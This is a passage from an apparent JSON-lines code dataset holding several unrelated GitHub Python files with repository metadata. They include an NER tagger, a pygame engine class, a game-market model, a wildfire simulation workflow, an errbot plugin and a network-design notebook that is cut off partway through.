it said .',\n 'Korea Tangun Trading Corp .',\n \"is responsible for the procurement of commodities and technologies to support the North 's defense research and development program .\",\n 'The company was also a target of U.S. and U.N. sanctions , the department said .',\n 'The sanctioned individuals include KOMID officials Kil Jong-hun , Kim Kwang-yon , Jang Song-chol , Kim Yong-chol , Jang Yong-son , Kim Kyu , Ryu Jin and Kang Ryong , as well as Yu Kwang-ho , a North Korean government official , and Kim Kwang-chun , a Tangun Trading Corp .',\n 'official \" .',\n 'Today \\'s actions are driven by our commitment to hold North Korea accountable for its destructive and destabilizing conduct , \" Secretary of the Treasury Jacob Lew said in a statement .',\n '\" Even as the FBI continues its investigation into the cyber-attack against Sony Pictures Entertainment , these steps underscore that we will employ a broad set of tools to defend U.S. businesses and citizens , and to respond to attempts to undermine our values or threaten the national security of the United States \" .',\n \"The new sanctions also underline the confidence the U.S. has in blaming the North for the Sony hack despite growing doubts about the FBI 's finding among American cyber-security specialists .\",\n \"Last week , a cyber-security firm , Norse , was reported to have briefed the FBI on the result of its own investigation that it was not North Korea , but laid-off Sony staff members that disrupted Sony 's computer network .\",\n 'On Friday , Scott Borg , director and chief economist of the U.S. Cyber Consequences Unit , an independent , nonprofit research institute specializing on cyber-threats and risks , also said in a commentary on the CNBC website that the skills employed in the Sony hack were too sophisticated for the North .']\n\ndataPath = 'Data/entity-annotated-corpus/ner_dataset.csv'\nmodel_weights = 'bi_lstm_crf_weight.h5'\n\ndata = load_data(dataPath)\nsentences, ner_tags = preprocess_data(data)\n\nsrc_tokenizer, _ = tozenizer(sentences, ner_tags)\nword_to_index = src_tokenizer.word_index\n\nmodel = biLSTM()\nprint(\"loading weight to bi-LSTM model...\")\nmodel.load_weights(model_weights)\n\n\nprint(ner_extract_from_text(model, text, word_to_index))\n'''\n\n\n","repo_name":"LeeDongYeun/news-stream-data-analysis","sub_path":"ner_tagging.py","file_name":"ner_tagging.py","file_ext":"py","file_size_in_byte":11651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5422516335","text":"import pygame\nfrom engine.sprite import *\nfrom pathlib import Path\nimport platform\n\nSOURCEPATH = Path(__file__).parents[1]\n\ndef run_cmd(path):\n if platform.system() == \"Linux\":\n if not os.access(os.path.abspath(os.path.join(SOURCEPATH, path)), os.X_OK):\n return sys.executable + \" \" + os.path.abspath(os.path.join(SOURCEPATH, path))\n return os.path.abspath(os.path.join(SOURCEPATH, path))\n\ndef source_path(path):\n return os.path.abspath(os.path.join(SOURCEPATH, path))\n\nclass Object:\n def __init__(self,x,y,width,height,imagefile=\"\",readyimage=False,isrect=True,color=pygame.Color(\"white\")):\n self.x=x\n self.readyimage=readyimage\n self.y=y\n self.width=width\n self.height=height\n self.isrect=isrect\n self.imagefile=imagefile\n self.color=color\n\n if self.isrect:\n self.rect=pygame.Rect(x,y,width,height)\n else:\n if self.imagefile != \"\":\n if not self.readyimage:\n self.image=pygame.image.load(self.imagefile)\n else:\n self.image=imagefile\n self.rect=self.image.get_rect()\n else:\n raise Exception(\"Object must have an imagefile or be a rect\")\n\n def change_image(self,imagefile):\n self.imagefile=imagefile\n self.image=pygame.image.load(self.imagefile)\n self.rect=self.image.get_rect()\n\n def update(self):\n if self.isrect:\n self.rect=pygame.Rect(self.x,self.y,self.width,self.height)\n else:\n self.rect=self.image.get_rect()\n self.rect.x=self.x\n self.rect.y=self.y\n self.width=self.rect.width\n self.height=self.rect.height\n \n def change_position(self,x,y):\n self.x=x\n self.y=y\n self.update()\n\n \n def draw(self,screen):\n if self.isrect:\n screen.fill(self.color,self.rect)\n else:\n screen.blit(self.image,self.rect)\n \nclass Platform:\n \"\"\"Creates Platform\"\"\"\n def __init__(self,y,x,spritefile=source_path(\"sprites.png\")):\n self.spritefile=spritefile\n self.sprites=Spritesheet(self.spritefile)\n self.left=self.sprites.get(0,0)\n self.center=self.sprites.get(0,1)\n self.right=self.sprites.get(0,2)\n self.y=y\n self.x=x\n self.rect=pygame.Rect(self.x,self.y,self.sprites.part_size[0]*3,self.sprites.part_size[1])\n \n def change_position(self,x,y):\n self.x=x\n self.y=y\n self.update()\n\n def update(self):\n self.rect=pygame.Rect(self.x,self.y,self.sprites.part_size[0]*3,self.sprites.part_size[1])\n \n def draw(self,screen):\n screen.blit(self.left,(self.x,self.y))\n screen.blit(self.center,(self.x+32,self.y))\n screen.blit(self.right,(self.x+64,self.y))\n","repo_name":"kerem3338/mission-akne","sub_path":"engine/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11182874200","text":"# coding: utf-8\nimport datetime\n\nfrom dext.common.utils import s11n\n\nfrom the_tale.finances.market import conf\n\n\nclass Good(object):\n __slots__ = ('type', 'name', 'uid', 'item')\n\n def __init__(self, type, name, uid, item):\n self.type = type\n self.name = name\n self.uid = uid\n self.item = item\n\n def serialize(self):\n from the_tale.finances.market import goods_types\n return {'type': self.type,\n 'name': self.name,\n 'uid': self.uid,\n 'item': goods_types.get_type(self.type).serialize_item(self.item)}\n\n @classmethod\n def deserialize(cls, data):\n from the_tale.finances.market import goods_types\n obj = cls(type=data['type'],\n name=data['name'],\n uid=data['uid'],\n item=goods_types.get_type(data['type']).deserialize_item(data['item']))\n return obj\n\n\n def html_label(self):\n from the_tale.finances.market import goods_types\n return goods_types.get_type(self.type).item_html(self.item)\n\n def group(self):\n from the_tale.finances.market import goods_types\n return goods_types.get_type(self.type).group_of(self.item)\n\n\n\nclass Lot(object):\n\n __slots__ = ('id', 'type', 'name', 'seller_id', 'buyer_id', 'state', 'good', 'price', 'created_at', 'commission', 'closed_at', 'group_id')\n\n def __init__(self, id, type, name, seller_id, buyer_id, state, good, price, created_at, commission, closed_at, group_id):\n self.id = id\n self.type = type\n self.name = name\n self.seller_id = seller_id\n self.buyer_id = buyer_id\n self.state = state\n self.good = good\n self.price = price\n self.created_at = created_at\n self.closed_at = closed_at\n self.commission = commission\n self.group_id = group_id\n\n @property\n def time_to_end(self):\n return max(self.created_at + datetime.timedelta(days=conf.settings.LOT_LIVE_TIME) - datetime.datetime.now(), datetime.timedelta(days=0))\n\n @classmethod\n def from_model(cls, model):\n data = s11n.from_json(model.data)\n\n return cls(id=model.id,\n created_at=model.created_at,\n type=model.type,\n name=model.name,\n seller_id=model.seller_id,\n buyer_id=model.buyer_id,\n state=model.state,\n good=Good.deserialize(data['good']),\n price=model.price,\n closed_at=model.closed_at,\n commission=model.commission,\n group_id=model.group_id)\n\n def to_model_fields(self):\n data = {'type': self.type,\n 'name': self.name,\n 'seller': self.seller_id,\n 'buyer': self.buyer_id,\n 'state': self.state,\n 'good_uid': self.good.uid,\n 'data': s11n.to_json({'good': self.good.serialize()}),\n 'price': self.price,\n 'closed_at': self.closed_at,\n 'commission': self.commission,\n 'group_id': self.group_id}\n return data\n\n\nclass Goods(object):\n __slots__ = ('id', 'account_id', '_goods')\n\n def __init__(self, id, account_id, goods):\n self.id = id\n self.account_id = account_id\n self._goods = goods\n\n\n @classmethod\n def from_model(cls, model):\n data = s11n.from_json(model.data)\n\n goods = {}\n for good_data in data.get('goods', ()):\n good = Good.deserialize(good_data)\n goods[good.uid] = good\n\n return cls(id=model.id,\n account_id=model.account_id,\n goods=goods)\n\n def to_model_fields(self):\n goods = [good.serialize() for good in self._goods.itervalues()]\n return {'data': s11n.to_json({'goods': goods})}\n\n def add_good(self, good):\n self._goods[good.uid] = good\n\n def get_good(self, good_uid):\n return self._goods.get(good_uid)\n\n def has_good(self, good_uid):\n return self.get_good(good_uid) is not None\n\n def remove_good(self, good_uid):\n if self.has_good(good_uid):\n del self._goods[good_uid]\n\n def goods_count(self):\n return len(self._goods)\n\n def has_goods(self):\n return bool(self.goods_count())\n\n def all(self):\n return sorted(self._goods.itervalues(), key=lambda good: good.name)\n\n def clear(self):\n self._goods = {}\n","repo_name":"qqname/the-tale","sub_path":"the_tale/finances/market/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"22284334731","text":"from dags.dbo.oracle_market_data_model import AIndexEODPrices, Oracle_Session\nfrom terminal.utils import DateTimeUtils\nfrom terminal import Logging\n\nlogger = Logging.getLogger(__name__)\n\n\nclass OracleAIndexEODPricesRepo:\n\n @staticmethod\n def get_a_index_eod_prices_by_date(trade_date):\n \"\"\"\n 根据时间获取数据\n :param trade_date:\n :return:\n \"\"\"\n logger.info('开始从a_index_eod_prices表获取日期为: %s的数据' % trade_date)\n oracle_session = Oracle_Session()\n a_index_eod_prices = oracle_session.query(AIndexEODPrices). \\\n filter(AIndexEODPrices.TRADE_DT == DateTimeUtils.date2str(trade_date, '%Y%m%d')).all()\n oracle_session.close()\n if len(a_index_eod_prices) == 0 or a_index_eod_prices is None:\n logger.info('从a_index_eod_prices表没有获取到日期为: %s的数据' % trade_date)\n return []\n\n logger.info('时间为: %s,在a_index_eod_prices表查询到了%d条数据' %\n (trade_date, len(a_index_eod_prices)))\n\n return a_index_eod_prices\n","repo_name":"zhanrendong/jkzx1","sub_path":"scripts/airflow/dags/dao/orcale_a_index_eod_prices_repo.py","file_name":"orcale_a_index_eod_prices_repo.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40581859993","text":"import json\n\nimport requests\n\nfrom cli.utils import fetch_auth\n\n\n@fetch_auth\ndef fetch_accounts(filters, url, auth_headers):\n \"\"\"fetch accounts\n\n Fetch accounts from ZumoLabs backend.\n\n Args:\n filters (dict): query param filters for API call\n url (str): backend endpoint\n auth_headers: authentication for backend\n \"\"\"\n endpoint = f\"{url}/api/v1/accounts/\"\n r = requests.get(endpoint, headers=auth_headers, params=filters)\n if r.status_code != 200:\n r.raise_for_status()\n return json.loads(r.text)[\"results\"]\n","repo_name":"ZumoLabs/zpy","sub_path":"cli/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"37"} +{"seq_id":"29568069313","text":"import sys\nimport json\nimport pony.orm as pny\nfrom Database.workflow import Simulation, Incident\nfrom SimulationManager.client import createSimulation, submitSimulation, SimulationManagerException, cancelSimulation\nfrom DataManager.client import moveDataViaDM, DataManagerException, getInfoForDataInDM, putByteDataViaDM, \\\n registerDataWithDM, copyDataViaDM, getByteDataViaDM\nfrom manager import workflow\nimport yaml\nimport datetime\n\n\nclass WildfireDataAccessException(Exception):\n def __init__(self, msg):\n self.msg = msg\n\n\n@workflow.handler\ndef wildfire_fire_static(msg):\n print(\"\\nPreparing static data for wildfire analyst\")\n\n msg[\"file\"] = \"Static wildfire analyst file\"\n\n workflow.send(msg, \"wildfire_fire_simulation\")\n\n\n@workflow.atomic\n@workflow.handler\ndef wildfire_fire_simulation(msg):\n print(\"\\nWildfire fire simulation handler\")\n IncidentID = msg[\"IncidentID\"]\n originator = msg[\"originator\"]\n\n # if originator == \"wildfire_fire_static\":\n # print(\"Static data received\")\n # workflow.Persist.Put(IncidentID,{\"originator\": originator, \"file\": file})\n # el\n if originator == \"wildfire_mesonh_results\":\n print(\"MesoNH forecast data received\")\n workflow.Persist.Put(IncidentID, {\"originator\": originator, \"weather_data_uuid\": msg[\"weather_data_uuid\"]})\n elif originator == \"wildfire_tecnosylva_hotspots\":\n print(\"Hotspots from Tecnosylva received\")\n workflow.Persist.Put(IncidentID, {\"originator\": originator, \"hotspot_data_uuid\": msg[\"hotspot_data_uuid\"]})\n else:\n raise ValueError(\"Unexpected originator %s\" % originator)\n\n logs = workflow.Persist.Get(IncidentID)\n\n # get the latest data for all 3 required data types\n # staticFile = None\n hotspotDataUUID = None\n weatherDataUUID = None\n for log in logs:\n if log[\"originator\"] == \"wildfire_fire_static\":\n staticFile = log[\"file\"]\n elif log[\"originator\"] == \"wildfire_tecnosylva_hotspots\":\n hotspotDataUUID = log[\"hotspot_data_uuid\"]\n elif log[\"originator\"] == \"wildfire_mesonh_results\":\n weatherDataUUID = log[\"weather_data_uuid\"]\n\n # if staticFile is not None and hotspotFile is not None and weatherFile is not None:\n if hotspotDataUUID and weatherDataUUID is not None:\n print(\"Dependencies met for WFA\")\n\n try:\n weather_data_info = getInfoForDataInDM(weatherDataUUID)\n except DataManagerException as err:\n print(\"Can not retrieve DM information for weather data \" + err.message)\n return\n\n try:\n callbacks = {'COMPLETED': 'wildfire_fire_results'}\n sim_id = createSimulation(IncidentID, 1, \"0:05:00\", \"Wildfire simulation\", \"wfa.sh\",\n queuestate_callbacks=callbacks, template_dir=\"templates/wildfire_template\",\n comment=\"Execution linked to hotspot data \" + hotspotDataUUID)[0]\n with pny.db_session:\n simulation = Simulation[sim_id]\n machine_name = simulation.machine.machine_name\n machine_basedir = simulation.machine.base_work_dir\n if machine_basedir[-1] != \"/\": machine_basedir += \"/\"\n\n hotspotData = getByteDataViaDM(hotspotDataUUID).decode('ascii')\n hotspot_dict = json.loads(hotspotData)\n\n if \"simDuration\" in hotspot_dict:\n simDuration = hotspot_dict['simDuration']\n else:\n print(\"Simulation duration (key simDuration) not in hotspot JSON data. This is required\")\n return\n if \"numberOfSims\" in hotspot_dict:\n numberOfSims = hotspot_dict['numberOfSims']\n else:\n numberOfSims = 2\n\n moveDataViaDM(hotspotDataUUID, machine_basedir + simulation.directory + \"/WFA_hotspots.json\", machine_name)\n\n try:\n putByteDataViaDM(\"wfa-template.yml\", machine_name, \"Wildfire configuration\", \"text/plain\", \"Wildfire workflow\",\n _buildWFAYaml(IncidentID, weather_data_info, simDuration, numberOfSims), path=simulation.directory)\n except DataManagerException as err:\n print(\"Can not write wildfire configuration to simulation location\" + err.message)\n return\n\n submitSimulation(sim_id)\n except SimulationManagerException as err:\n print(\"Error creating or submitting WFA simulation \" + err.message)\n return\n\n\n@pny.db_session\ndef _buildWFAYaml(incidentId, weather_datainfo, simDuration, sims_per_rank):\n myincident = Incident[incidentId]\n upperLeft = myincident.upper_left_latlong\n lowerRight = myincident.lower_right_latlong\n\n upperLeftLon, upperLeftLat = upperLeft.split(\"/\")\n lowerRightLon, lowerRightLat = lowerRight.split(\"/\")\n\n sample_configuration_file = open(\"workflows/wildfire/templates/wfa-template.yml\")\n yaml_template = yaml.load(sample_configuration_file, Loader=yaml.FullLoader)\n yaml_template[\"upperleft\"][\"lat\"] = float(upperLeftLat)\n yaml_template[\"upperleft\"][\"lon\"] = float(upperLeftLon)\n yaml_template[\"lowerright\"][\"lat\"] = float(lowerRightLat)\n yaml_template[\"lowerright\"][\"lon\"] = float(lowerRightLon)\n\n yaml_template[\"weather_data\"][\"path\"] = weather_datainfo[\"absolute_path\"]\n yaml_template[\"dynamic_config\"][\"path\"] = \"WFA_hotspots.json\"\n yaml_template[\"sim_duration\"] = simDuration\n yaml_template[\"sims_per_rank\"] = sims_per_rank\n\n return yaml.dump(yaml_template)\n\n\n@workflow.handler\ndef wildfire_fire_results(msg):\n IncidentID = msg[\"IncidentID\"]\n simulationId = msg[\"simulationId\"]\n simulationIdPostfix = simulationId.split(\"-\")[-1]\n directoryListing = msg[\"directoryListing\"]\n\n print(\"\\nResults available for wildfire analyst simulation!\")\n hotspotDataUUID = None\n if \"hotspot_data_uuid\" in msg:\n hotspotDataUUID = msg[\"hotspot_data_uuid\"]\n\n if hotspotDataUUID is not None:\n hotspotData = getByteDataViaDM(hotspotDataUUID).decode('ascii')\n hotspot_dict = json.loads(hotspotData)\n if \"simDuration\" in hotspot_dict:\n simDuration = hotspot_dict['simDuration']\n else:\n print(\"\\nSimulation duration (key simDuration) not in hotspot JSON data. This is required\")\n return\n else:\n print(\"\\nNo hotspot data UUID to retrieve simDuration. This is required\")\n return\n\n with pny.db_session:\n myincident = Incident[IncidentID]\n simulation = Simulation[simulationId]\n machine_name = simulation.machine.machine_name\n machine_basedir = simulation.machine.base_work_dir\n if machine_basedir[-1] != \"/\": machine_basedir += \"/\"\n\n if simulation is not None:\n result_files = {}\n for entry in directoryListing:\n tokens = entry.split()\n if len(tokens) == 9 and \".tif\" in tokens[8]:\n result_files[tokens[8]] = int(tokens[4])\n\n try:\n data_uuid_test_fire_best = _registerWFAResultFile(\"test_Fire_Best.tif\", result_files, machine_name,\n simulation.directory, IncidentID, simulationId)\n data_uuid_test_fireshed_best = _registerWFAResultFile(\"test_FireShed_Best.tif\", result_files, machine_name,\n simulation.directory, IncidentID, simulationId)\n data_uuid_test_variance = _registerWFAResultFile(\"test_Fire_Variance.tif\", result_files, machine_name,\n simulation.directory, IncidentID, simulationId)\n data_uuid_test_mean = _registerWFAResultFile(\"test_Fire_Mean.tif\", result_files, machine_name,\n simulation.directory, IncidentID, simulationId)\n except WildfireDataAccessException as err:\n with pny.db_session:\n simulation = Simulation[simulationId]\n simulation.status = \"ERROR\"\n simulation.status_message = err.msg\n simulation.status_updated = datetime.datetime.now()\n pny.commit()\n return\n \n _registerMatchingFiles(directoryListing, \".vtu\", machine_name, \"WFA simulation\", \"application/octet-stream\", \"VTU paraview output\", \n simulation.directory, IncidentID, \"WFA paraview output file\", \"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n \n _registerMatchingFiles(directoryListing, \".pvtp\", machine_name, \"WFA simulation\", \"application/octet-stream\", \"PVTP paraview output\", \n simulation.directory, IncidentID, \"WFA paraview output file\", \"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n \n _registerMatchingFiles(directoryListing, \".vtp\", machine_name, \"WFA simulation\", \"application/octet-stream\", \"VTP paraview output\", \n simulation.directory, IncidentID, \"WFA paraview output file\", \"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n \n _registerMatchingFiles(directoryListing, \".vti\", machine_name, \"WFA simulation\", \"application/octet-stream\", \"VTI paraview output\", \n simulation.directory, IncidentID, \"WFA paraview output file\", \"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n\n\n try:\n callbacks = {'COMPLETED': 'wildfire_post_results'}\n pp_sim_id = createSimulation(IncidentID, 1, \"0:05:00\", \"Wildfire postprocessing\", \"wfapost.sh\",\n queuestate_callbacks=callbacks,\n template_dir=\"templates/wildfire_post_template\",\n comment=\"Executed following WFA simulation \" + simulationId)[0]\n with pny.db_session:\n post_proc_simulation = Simulation[pp_sim_id]\n post_proc_machine_name = post_proc_simulation.machine.machine_name\n\n try:\n putByteDataViaDM(\"wfapost.yml\", machine_name, \"Wildfire post-processing configuration\", \"text/plain\",\n \"Wildfire workflow\",\n _buildWFAPostYaml(simulation.directory, machine_basedir, simDuration),\n path=post_proc_simulation.directory)\n except DataManagerException as err:\n print(\"Can not write wildfire post processing configuration to simulation location\" + err.message)\n return\n\n submitSimulation(pp_sim_id)\n except SimulationManagerException as err:\n print(\"Error creating or submitting WFA post-processing simulation \" + err.message)\n return\n\n\ndef _registerWFAResultFile(filename, result_files, machine_name, directory, incidentId, simulationId):\n if filename not in result_files:\n return\n # For now comment this out, we need logic to correctly drive this based on the hotspot data\n # raise WildfireDataAccessException(\"Expected result file is not available from the simulation, this indicates the execution failed\")\n try:\n data_uuid = registerDataWithDM(filename, machine_name, \"WFA simulation\", \"application/octet-stream\",\n result_files[filename],\n \"GTIF\", path=directory, associate_with_incident=True, incidentId=incidentId,\n kind=\"WFA output file\",\n comment=\"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n return data_uuid\n except DataManagerException as err:\n print(\"Error registering WFA result data with data manager, aborting \" + err.message)\n raise WildfireDataAccessException(\"Error registering WFA result data with data manager on the VESTEC system\")\n\ndef _registerMatchingFiles(directoryListing, matching_ending, machine_name, source, meta_file_description, description, directory, IncidentID, kind_description, commentStr):\n for entry in directoryListing:\n tokens=entry.split()\n if len(tokens) == 9 and matching_ending in tokens[-1]:\n if tokens[4].isnumeric():\n file_size=int(tokens[4])\n else:\n file_size=0\n try:\n registerDataWithDM(tokens[-1], machine_name, source, meta_file_description, file_size, description, \n path=directory, associate_with_incident=True, incidentId=IncidentID, kind=kind_description, \n comment=commentStr)\n except DataManagerException as err:\n print(\"Error registering \"+description+\" with data manager, aborting \"+err.message)\n return \n\n@pny.db_session\ndef _buildWFAPostYaml(simulation_directory, machine_basedir, simDuration):\n if simulation_directory[-1] != \"/\": simulation_directory += \"/\"\n\n sample_configuration_file = open(\"workflows/wildfire/templates/wfapost.yml\")\n yaml_template = yaml.load(sample_configuration_file, Loader=yaml.FullLoader)\n yaml_template[\"normal_gtif\"][\"path\"] = machine_basedir + simulation_directory + \"test_Fire_Best.tif\"\n yaml_template[\"fireshed_gtif\"][\"path\"] = machine_basedir + simulation_directory + \"test_FireShed_Best.tif\"\n yaml_template[\"variance\"][\"path\"] = machine_basedir + simulation_directory + \"test_Fire_Variance.tif\"\n yaml_template[\"mean\"][\"path\"] = machine_basedir + simulation_directory + \"test_Fire_Mean.tif\"\n\n yaml_template[\"sim_duration\"] = simDuration\n\n return yaml.dump(yaml_template)\n\n\n@workflow.handler\ndef wildfire_post_results(msg):\n print(\"Post processing of WFA results completed\")\n\n IncidentID = msg[\"IncidentID\"]\n simulationId = msg[\"simulationId\"]\n directoryListing = msg[\"directoryListing\"]\n\n with pny.db_session:\n simulation = Simulation[simulationId]\n machine_name = simulation.machine.machine_name\n\n for entry in directoryListing:\n tokens = entry.split()\n if len(tokens) == 9 and \".png\" in tokens[8]:\n try:\n registerDataWithDM(tokens[8], machine_name, \"WFA post-processing\", \"image/png\", int(tokens[4]),\n \"WFA output PNG\",\n path=simulation.directory, associate_with_incident=True, incidentId=IncidentID,\n kind=\"WFA image file\",\n comment=\"Created by WFA post-processor on \" + machine_name + \" with simulation ID \" + simulationId)\n except DataManagerException as err:\n print(\"Error registering WFA post-processed PNG '\" + tokens[\n 8] + \"' with data manager, aborting \" + err.message)\n\n if len(tokens) == 9 and \".kmz\" in tokens[8]:\n try:\n registerDataWithDM(tokens[8], machine_name, \"WFA post-processing\", \"image/octet-stream\", int(tokens[4]),\n \"WFA output KMZ\",\n path=simulation.directory, associate_with_incident=True, incidentId=IncidentID,\n kind=\"WFA KMZ file\",\n comment=\"Created by WFA post-processor on \" + machine_name + \" with simulation ID \" + simulationId)\n except DataManagerException as err:\n print(\"Error registering WFA post-processed KMZ '\" + tokens[\n 8] + \"' with data manager, aborting \" + err.message)\n\n\ndef RegisterHandlers():\n workflow.RegisterHandler(wildfire_fire_simulation, \"wildfire_fire_simulation\")\n workflow.RegisterHandler(wildfire_fire_static, \"wildfire_fire_static\")\n workflow.RegisterHandler(wildfire_fire_results, \"wildfire_fire_results\")\n workflow.RegisterHandler(wildfire_post_results, \"wildfire_post_results\")\n","repo_name":"VESTEC-EU/vestec-system","sub_path":"WorkflowManager/workflows/wildfire/wildfire.py","file_name":"wildfire.py","file_ext":"py","file_size_in_byte":16062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25537639715","text":"inFile = \"C:\\\\Users\\\\dg\\\\Desktop\\\\Z80\\\\psgconv\\\\Illusion.psg_.PSG\"\r\n#inFile = \"C:\\\\Users\\\\dg\\\\Desktop\\\\Z80\\\\psgconv\\\\n1k-o, TmK - lost madness (2018) (DiHalt Lite 2018, 2).PSG\"\r\noutFile = \"C:\\\\Users\\\\dg\\\\Desktop\\\\Z80\\\\psgconv\\\\song.s\"\r\n\r\nbyteCounter = 0\r\nmaxBytes=4096*3\r\ncolCounter = 0\r\noutFileS = open(outFile, 'w')\r\n\r\n\r\noutFileS.writelines(\"song_demo2:\\n\")\r\n\r\nwith open(inFile, 'rb') as f:\r\n f.read(16) # skip first 16 bytes\r\n\r\n lineArray = []\r\n\r\n while 1:\r\n byte_s = f.read(1)\r\n if not byte_s:\r\n break\r\n byte = byte_s[0]\r\n\r\n lineArray.append(\"0x{:02x}\".format(byte))\r\n byteCounter+= 1\r\n colCounter+=1\r\n if colCounter == 16:\r\n colCounter = 0\r\n outFileS.writelines(\" db \" + ','.join(lineArray)+\"\\n\")\r\n\r\n lineArray = []\r\n if byteCounter==maxBytes:\r\n outFileS.writelines(\" db 0xF0\\n\")\r\n outFileS.writelines(\" ;EOF\")\r\n exit(0)\r\n\r\nwhile 1:\r\n continue\r\n","repo_name":"dennis9819/Z80-Homebrew-Computer","sub_path":"Utilities/psgconv/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70638155946","text":"import json\nfrom urllib.error import HTTPError\nfrom urllib.request import urlopen\n\nfrom errbot import BotPlugin, botcmd\n\nUSER = \"\"\"\n User: %(username)s\n Name: %(name)s\n Team: %(team)s\n location: %(location)s\nendorsements: %(endorsements)s\n\"\"\"\nBADGE = \"%(name)20s -- %(description)s -- %(badge)s\"\n\n\nclass Coderwall(BotPlugin):\n @botcmd\n def coderwall(self, mess, args):\n \"\"\"Shows the badges of a coderwall user\n Example: !coderwall gbin\n \"\"\"\n if not args:\n return \"Am I supposed to guess the username?...\"\n response = None\n username = args.strip()\n try:\n content = urlopen(f\"http://coderwall.com/{username}.json\")\n results = json.loads(content.read().decode())\n for badge in results[\"badges\"]:\n self.send(mess.frm, BADGE % badge)\n response = USER % results\n except HTTPError:\n response = \"User not found.\"\n return response\n","repo_name":"errbotio/err-coderwall","sub_path":"coderwall.py","file_name":"coderwall.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4655312194","text":"import os\nimport sys\nimport re\nimport subprocess\n\ndef copy(indir,keywords,outdir):\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n for(root,dir,files) in os.walk(indir):\n for file in files:\n path=os.path.join(root,file)\n if re.search(keywords,path):\n subprocess.call('cp %s %s'%(path,outdir),shell=True)\n\nif __name__ == '__main__':\n if len(sys.argv)!=4:\n print(\"usage:python3 %s inputdir keywords outdir\"%(sys.argv[0]))\n print(\"Email:fanyucai1@126.com\")\n else:\n indir=sys.argv[1]\n keywords=sys.argv[2]\n outdir=sys.argv[3]\n copy(indir, keywords, outdir)\n","repo_name":"fanyucai1/script","sub_path":"file_copy.py","file_name":"file_copy.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26848541115","text":"#dd-markdown # Network Design \n#dd-markdown \n#dd-markdown Network Design is a critical business problems in many industries. \n#dd-markdown For example, a retailer might want to decide where to open a new warehouse to optimize supply chain cost between plants or providers and custoemrs or chops.\n#dd-markdown Another example, is a water dsitribuiton company might want to plan improvement i the distribution network, creating new tanks or new pipes.\n#dd-markdown \n#dd-markdown From a Decision Optimization perspective, some of these problems are part of the Facility Location Problem (FLP) category.\n#dd-markdown A simple version of this problem is presented here, with multiple commodities (products) and a single period.\n#dd-markdown \n#dd-markdown Input data is the existing network (nodes and links), with some flow capacities.\n#dd-markdown \n#dd-markdown Data also incldues some plans or predictions of what we will be produced atplants or available from providers, and predictions of what is expected by shops or customers.\n#dd-markdown \n#dd-markdown The decisions are where to open a new node.\n#dd-markdown \n#dd-markdown The problem might include:\n#dd-markdown * structural constraints:\n#dd-markdown * what enters into a node is what gets out of a node.\n#dd-markdown * constraints on nodes:\n#dd-markdown * limited flow capacity\n#dd-markdown * costs on nodes:\n#dd-markdown * fixed cost (i.e. cost to open a new node)\n#dd-markdown * variables flow cost (i.e. cost to manage the items for this node)\n#dd-markdown * constraints on links:\n#dd-markdown * limited capacity\n#dd-markdown * costs on links:\n#dd-markdown * variable cost according to flos (i.e. transportation cost)\n#dd-cell\n# Import pandas package to manage data as dataframes\nimport pandas as pd\n#dd-markdown ### Prepare data\n#dd-markdown \n#dd-markdown The paramaters input table includes:\n#dd-markdown * the minimum and maximal number of new distribution centers to be considered\n#dd-markdown * some limits on the niumber f products and custoemrs to consider so that the optimization problem can be reduced and solved into the CPLEX Community Edition available on all environments.\n#dd-cell\ndf_parameters = inputs['PARAMETERS']\ndf_parameters = df_parameters.set_index(['name'])\nMAX_CUSTOMERS = df_parameters.value['MAX_CUSTOMERS']\n\nMAX_PRODUCTS = df_parameters.value['MAX_PRODUCTS']\nprint (df_parameters)\n#dd-markdown Structure the rest of the data\n#dd-cell\ndf_plants = inputs['PLANTS']\nplants = df_plants['id'].values.tolist()\ndf_plants = df_plants.set_index(['id'])\n\nprint ('\\nPlants:')\nprint (df_plants)\n\ndf_distributionCenters = inputs['DISTRIBUTION_CENTERS']\ndistributionCenters = df_distributionCenters['id'].values.tolist()\ndf_distributionCenters = df_distributionCenters.set_index(['id'])\n\nprint ('\\nDistribution Centers:')\nprint (df_distributionCenters)\n\ndf_products = inputs['PRODUCTS']\nif (MAX_PRODUCTS < len(df_products)):\n df_products = df_products.sample(MAX_PRODUCTS)\nproducts = df_products['id'].values.tolist()\n\nprint ('\\nProducts:')\nprint (df_products)\n\ndf_customers = inputs['CUSTOMERS']\nif (MAX_CUSTOMERS < len(df_customers)):\n df_customers = df_customers.sample(MAX_CUSTOMERS)\ncustomers = df_customers['id'].values.tolist()\ndf_customers = df_customers.set_index(['id'])\n\nprint ('\\nCustomers:')\nprint (df_customers)\n\ndf_demand = inputs['DEMAND']\ndf_demand = df_demand.set_index(['customerId', 'productId'])\n\ndf_productionData = inputs['PRODUCTION_DATA']\ndf_productionData = df_productionData.set_index(['plantId', 'productId'])\n\ndf_storageData = inputs['STORAGE_DATA']\ndf_storageData = df_storageData.set_index(['dcId', 'productId'])\n\ndf_inboundData = inputs['INBOUND_DATA']\ndf_inboundData = 